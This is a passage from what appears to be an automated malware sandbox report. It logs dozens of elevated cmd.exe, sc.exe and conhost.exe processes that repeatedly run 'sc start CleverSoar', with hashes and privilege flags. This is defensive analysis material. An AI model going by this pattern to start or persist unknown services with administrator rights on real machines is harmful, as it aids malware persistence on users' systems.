                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:41
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:42
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:43
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:44
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:45
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:46
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:47
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:48
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:49
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:50
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:51
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:52
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:53
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:54
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:55
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:56
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:57
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:58
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:59
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:60
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff7403e0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:61
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:62
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:63
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:64
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:65
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:66
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:67
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:68
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:69
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:70
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:71
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:72
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:73
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:74
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:75
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:76
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:77
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:78
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:79
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:80
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:81
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:82
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:83
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:84
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:85
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:86
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:87
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:88
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:89
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:90
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:91
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:92
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:93
                              Start time:23:07:10
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
